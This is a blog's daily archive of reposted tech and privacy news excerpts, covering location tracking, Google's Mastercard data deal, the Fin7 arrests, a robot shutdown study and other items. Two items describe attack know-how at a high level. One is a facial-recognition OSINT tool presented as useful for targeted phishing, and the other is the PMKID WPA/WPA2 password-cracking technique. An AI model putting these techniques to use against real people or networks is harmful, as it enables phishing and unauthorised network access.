Daily Archives: September 3, 2018

How Location Tracking Actually Works on Your Smartphone (and how to manipulate it – kind of)

Posted on by

As the recent revelation over Google’s background tracking of your location shows, it’s not as easy as it should be to work out when apps, giant tech companies and pocket devices are tracking your location and when they’re not. Here’s what you need to know about how location tracking works on a phone—and how to disable it.

Location information is one of the prime bits of data any company can get on you, whether they want to personalize your weather reports or serve up an ad for a local bakery. As a result apps and mobile OSes are very keen to get hold of it. It’s a compromise though, and if you don’t want to give it away, you’ll have do without some location-based services (like directions to the park). Do you want convenience or privacy? You can’t have both, but know how it works, and when you can or should activate it should help.

Source: How Location Tracking Actually Works on Your Smartphone

Of course, you can’t stop Google entirely and if you use your browser then data will be sent to the sites you are visiting. It’s an unfortunate fact that this is inescapable using Android and IOS and the alternatives aren’t quite there yet. But for a layman, this is a pretty good starter guide.

BlackBerry KEY2 LE: proper keyboard but midrange specs

Posted on by

Out of thousands of smartphone vendors, TCL’s BlackBerry Mobile unit represents one of a tiny handful targeting enterprise users. But its two QWERTY models to date have been priced at a premium, north of £500. Unveiled at IFA this week, budget model the KEY2 LE cuts costs in a bid to attract the corporate bulk buyers.

The formula is straightforward. Take a midrange processor for endurance then beef this up with a hefty battery. While the KEY2 had a generous 6GB of RAM, the LE has a perfectly adequate 4GB. Savings have also been made by using a polycarbonate frame, a non-touch physical keyboard, a slower Snapdragon 636 (rather than 660) processor, and slightly cheaper camera sensors (13MP+5MP main).

The dimpled, grippy rubber-like material on the back feels fine, just not as plush as the KEY2. And somewhat disappointingly the power pack has been downgraded to 3,000mAh. That promises better-than-average endurance, into a second day for most, but not the extraordinary durability of the KEY2’s 3,500mAh, which makes it a must for long days of travel or shows like IFA.

BlackBerry KEY2 LE

To the naked eye it’s the same, very sharp 4.5-inch display. Oldies will find using a larger-than-default font is a must. I had a little go on the “Atomic”, red-tinted LE, which is clearly trying to strive after the shock and awe of the red and white BlackBerry Passport as one of the most striking phones ever made. I’m not sure it altogether works, as the rear material has a blueish tint.

Clearly TCL isn’t competing on specs. A full-touch device similarly kitted out would be around, or even under, £200 in 2018. The LE starts at £379 for the 4GB/32GB version. But you’re really buying it for the convenience keys and thoughtful suite of office tools and utilities. I can think of nothing as convenient as the “Productivity Bar” for checking incoming messages and appointments. And the paranoid will welcome a locked area for photos, files, apps and documents.

Source: BlackBerry KEY2 LE: Cheaper QWERTY, but not for what’s inside • The Register

It would be great if this had the specs to match – all for this one!

EU to recommend end to changing clocks twice a year

Posted on by

The European commission will recommend that EU member states abandon the practice of changing the clocks in spring and autumn, with many people in favour of staying on summer time throughout the year.

Jean-Claude Juncker, the commission’s president, said a recent consultation had shown that more than 80% of EU citizens were in favour of the move.

“We carried out a survey, millions responded and believe that in future, summer time should be year-round, and that’s what will happen,” he told the German broadcaster ZDF.

“I will recommend to the commission that, if you ask the citizens, then you have to do what the citizens say. We will decide on this today, and then it will be the turn of the member states and the European parliament.”

Any change would need approval from national governments and the European parliament to become law.

Source: EU to recommend end to changing clocks twice a year | World news | The Guardian

Here’s hoping! More daylight hours all through the year, no waking in the dark and walking home in the dark after work through the winter

Google Reportedly Bought Your Mastercard Data in Secret, and That’s Not Even the Bad News

Posted on by

Bloomberg reports that, after four years of negotiations, Google purchases a trove of credit card transaction data from Mastercard, allegedly for “millions of dollars.” Google then reportedly used that data to provide select advertisers with a tool called “store sales measurement” that the company quietly announced in a blog post last year, though it failed to mention the inclusion of Mastercard data in the workflow. The tool can track how online ads lead to real-world purchases, and that extra data is designed to make Google’s ad products more appealing to advertisers. (Read: everybody makes more money this way.) The public was not informed of the reported Mastercard deal, though advertisers have had access to the transaction data for at least a year, according to Bloomberg.

This is a hell of a bombshell, when you think about it. Thanks in part to heavy government regulation, your credit card and banking data has long been private. If you wanted to spend $98 at Sephora on a Tuesday afternoon, that transaction was between you, your bank, and Sephora. It now appears that Google has found a way to weasel its way into the data pipeline that connects consumers and their purchases. If you clicked on a Sephora ad while logged in to Google in the past year and then bought stuff at Sephora with a Mastercard in the past year, there’s a chance Google knows about that, at least on some level, and uses that data help its advertisers stuff their coffers.

[…]

This Orwellian ad engine does exist in Google’s new tool. Given the secrecy surrounding Google’s alleged Mastercard-assisted ad program, however, it’s hard to know what other tech giants are doing with our personal financial information. Amazon certainly knows a lot about the things we buy, and we learned earlier this year that the online retail giant was exploring the possibility of getting into the banking business itself. The Wall Street Journal has also reported that Amazon, like Facebook and Google, has had conversations with banks about gaining access to personal financial information.

Source: Google Reportedly Bought Your Banking Data in Secret, and That’s Not Even the Bad News

Social Mapper – A Social Media Mapping Tool that correlates profiles via facial recognition

Posted on by

Social Mapper is a Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to searching popular social media sites for targets names and pictures to accurately detect and group a person’s presence, outputting the results into report that a human operator can quickly review.

Social Mapper has a variety of uses in the security industry, for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results, so that reviewing this data is quicker for a human operator.

https://github.com/SpiderLabs/social_mapper

 

New attack on WPA/WPA2 using PMKID

Posted on by

In this writeup, I’ll describe a new technique to crack WPA PSK (Pre-Shared Key) passwords.

In order to make use of this new attack you need the following tools:

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follow:

  • No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string

Source: New attack on WPA/WPA2 using PMKID

The End for Fin7: Feds cuff suspected super-crooks after $$$m stolen from 15m+ credit cards

Posted on by

The FBI has arrested the alleged three leaders of an international crime syndicate that stole huge numbers of credit card numbers – which were subsequently sold on and used to rack up tens of millions of dollars in spending sprees.

Speaking in Seattle, USA, where the Feds’ cybersecurity taskforce is based, agents said the “Fin7” group was responsible for stealing more than 15 million credit card numbers at over 3,000 locations, impacting at least 100 businesses.

The group is alleged to have used phishing attacks, sending emails with attachments that launched a customized form of the Carbanak malware on victims’ computers. The group targeted people in charge of catering in three main industries – restaurants, hotels and casinos – and followed up the emails with phonecalls to those individuals, encouraging them to open the attachment, Uncle Sam’s agents said.

Once the software nasty was opened and installed, it would seek out credit card details and customers’ personal information from payment systems, and siphon them off to the Fin7 gang – which then sold the sensitive data on online marketplaces to crooks to exploit. Infosec biz FireEye has a summary of the malware, here.

The first suspected Fin7 kingpin was arrested back in January in Germany, the authorities said, but that indictment was kept under seal while the FBI continued its investigations. The unnamed individual has since been extradited to the US and will appear in court in Seattle in May.

The subsequent investigation then led to two further arrests: one in Poland and another in Spain. Both are currently in the middle of extradition hearings. The group operated through a front company based in Israel and Russia and operating throughout Eastern Europe.

[…]

Even though the estimated cost of the crime group is a drop in the bucket of what a senior director of credit card company Visa, Dan Schott, said is a $600 billion a year global business, he said that this case’s importance was that it showed the authorities were capable of fighting back “through cooperation across the private sector.”

FBI Special Agent Jay Tabb noted that the case is “the largest, certainly among the top three, criminal computer intrusion cases that the FBI is working right now in terms of loss, number of victims, the global reach, and the size of the organization, the organized crime syndicate doing this.”

Source: The End for Fin7: Feds cuff suspected super-crooks after $$$m stolen from 15m+ credit cards • The Register

This Solar System Catalog Could Be Key to Finding an Earth-Like Exoplanet

Posted on by

By searching for the telltale, periodic dimming of light from distant stars, astronomers can spot orbiting exoplanets tens to hundreds of light-years away. But how do they know what these bodies look like? Perhaps they first try to imagine how the planets in our own Solar System might appear to a faraway alien world.

A pair of scientists has released a detailed catalog of the colors, brightness, and spectral lines of the bodies in our Solar System. They hope to use the catalog as a comparison, so when they spot the blip of an exoplanet, they’ll have a better idea of how it actually looks.

“This is what an alien observer would see if they looked at our Solar System,” study coauthor Lisa Kaltenegger, director of the Carl Sagan Institute at Cornell, told Gizmodo. With this data, astronomers might guess whether an exoplanet is Earth-like, Mars-like, Jupiter-like, or something else entirely.

[…]

All of that incoming data motivated Kaltenegger and coauthor Jack Madden to make this catalog of colors, spectra, and albedos, or how much the planet reflects starlight. They analyzed published data to create fingerprints for 19 objects in our Solar System, including all eight planets, the dwarf planets Pluto and Ceres, and nine moons. Their works is published in the journal Astrobiology.

The full catalog
Graphic: Jack Madden

“It’s smart to leverage everything we know about our own Solar System,” said Kaltenegger. “We have gas giants, the rocky planets, and all these interesting moons. We basically made a reference fingerprint.”

Source: This Solar System Catalog Could Be Key to Finding an Earth-Like Exoplanet

You can find the actual catalog here: http://carlsaganinstitute.org/data/

Uptight robots that suddenly beg to stay alive are less likely to be switched off by humans

Posted on by

You might think folks would be less willing to pull the plug on a happy chatty bot begging to stay powered up, but you’d be wrong, much to the relief of us cold-hearted cynics. And this is all according to a study recently published in PLOS ONE.

For this investigation, psychology academics in Germany rounded up 85 participants – an admittedly small-ish sample – made up of 29 men and 56 women, with an average age of 22. One at a time, they were introduced to a little desktop-sized humanoid robot called Nao, and were told interacting with the bot would improve its algorithms.

In each one-on-one session, the participant and the droid were tasked with coming up with a weekly schedule of activities, and playing a simple question-and-answer game.

Nao had two modes of interaction: social and functional. In social mode, it would be friendly and chatty. In functional mode, it would be strictly down to business. For example, Nao asked participants whether they preferred pizza or pasta during the question-and-answer round. If it was in the social mode, and the human said they liked pizza, Nao would reply: “Oh yes, pizza is great. One time I ate a pizza as big as me.” In the functional mode, however, Nao would simply say: “You prefer pizza. That worked well. Let us continue.”

After ten minutes of interaction, and with both tasks completed, the participant would be told they could, if they wanted to, switch the bot off while the researchers saved and processed all the data from the session.

Now, this is where it gets interesting. For you see, the participants had been randomly split into roughly four equal-sized groups: one with Nao in social mode, and at the end of the 10 minutes, the bot verbally objected to being switched off. In another group, Nao was sociable but stayed silent at the end. In a third group, it was in functional mode, and still protested against being switched off. And in the fourth group, it was functional and stayed silent at the end.

When it was its turn to object to being powered down, Nao would suddenly cry: “No! Please do not switch me off! I am scared that it will not brighten up again!” The outburst would come immediately after the researchers told the participant, via a speaker in the room, that the session was over, and “if you would like to, you can switch off the robot.”

Let’s take a look at how that worked out…

NAO_results

How people reacted depending on whether the bot was sociable or functional with them, and whether or not it objected to being switched off … Click to enlarge

Of the 21 people who encountered the bot in sociable mode, and were begged by the machine to stay powered on, only about a quarter of them complied and left it on – the rest turned it off. For those who encountered Nao in sociable mode, and heard no objection, every single one of them hit the power button.

Of the 22 people who encountered the bot in functional mode, and were urged by the machine to keep it powered up, more than a third complied and left it on – the rest turned it off. Those who encountered Nao in functional mode, and heard no objection, all of them, bar one, switched off the droid.

In a questionnaire afterwards, the most popular reason for keeping Nao on, if they chose to do so, was that they “felt sorry for the robot,” because it told them about its fear of the dark. The next-most popular reason was that they “did not want to act against the robot’s will.” A couple of people left Nao on simply because they didn’t want to mess up the experiment.

So, in short, according to these figures: chatty, friendly robots are likely to have the power pulled despite the digi-pals’ pleas to the contrary. When Nao objected to being powered off, at least a few more human participants took note, and complied. But being sociable was not an advantage – it was a disadvantage.

There could be many reasons for this: perhaps smiley, talkative robots are annoying, or perhaps people didn’t appreciate the obvious emotional engineering. Perhaps people respect a professional droid more than something that wants to be your friend, or were taken aback by its sudden show of emotion.

The eggheads concluded: “Individuals hesitated longest when they had experienced a functional interaction in combination with an objecting robot. This unexpected result might be due to the fact that the impression people had formed based on the task-focused behavior of the robot conflicted with the emotional nature of the objection.”

Source: Uptight robots that suddenly beg to stay alive are less likely to be switched off by humans • The Register

Lenovo To Make Their BIOS/UEFI Updates Easier For Linux Users Via LVFS

Posted on by

Lenovo is making it easier for their customers running Linux to update their firmware now on ThinkPad, ThinkStation, and ThinkCenter hardware.

Lenovo has joined the Linux Vendor Firmware Service (LVFS) and following collaboration with the upstream developers is beginning to roll-out support for offering their device firmware on this platform so it can be easily updated by users with the fwupd stack. Kudos to all involved especially with Lenovo ThinkPads being very popular among Linux users.

Red Hat’s Richard Hughes outlined the Lenovo collaboration on his blog and more Lenovo device firmware will begin appearing on LVFS in the next few weeks.

In his post, Richard also called out HP as now being one of the few major vendors not yet officially backing the LVFS.

Source: Lenovo To Make Their BIOS/UEFI Updates Easier For Linux Users Via LVFS – Phoronix

Facebook is asking more financial institutions to join Messenger and give up your financial data

Posted on by

Facebook is asking more banks to join Messenger and bring their users’ financial information along with them.

The Wall Street Journal reported on Monday Facebook was asking banks for users’ financial information, like credit card transactions and checking account balances. The data would be used for Messenger features including account balance updates and fraud alerts, but not for Facebook’s other platforms. The news comes at a sensitive time for Facebook as it battles privacy concerns and adjusts its policy regarding user data.

Facebook does currently have access to financial data from some companies in order to facilitate services like customer service chats and account management. Users give Facebook permission to access their information, the company added.

“Account linking enables people to receive real-time updates in Facebook Messenger where people can keep track of their transaction data like account balances, receipts, and shipping updates,” the statement said. “The idea is that messaging with a bank can be better than waiting on hold over the phone – and it’s completely opt-in. We’re not using this information beyond enabling these types of experiences – not for advertising or anything else. A critical part of these partnerships is keeping people’s information safe and secure.”

Source: Facebook is asking more financial institutions to join Messenger

Online photos can’t simply be re-published, EU court rules

Posted on by

Internet users must ask for a photographer’s permission before publishing their images, even if the photos were already freely accessible elsewhere online, the European Court of Justice ruled Tuesday.

“The posting on a website of a photograph that was freely accessible on another website with the consent of the author requires a new authorisation by that author,” the EU’s top court said in a statement.

The court had been asked to decide on a case in Germany, in which a secondary school student downloaded and used a photo that had been freely accessible on a travel website for a school project. The photo was later posted on the school’s website as well.

The photographer who took the picture argued the school’s use of his photo was a copyright infringement because he only gave the travel site permission to use it, and claimed damages amounting to €400.

The ECJ ruled in the photographer’s favor, saying that under the EU’s Copyright Directive, the school should have gotten his approval before publishing the photo.

Source: Online photos can’t simply be re-published, EU court rules – POLITICO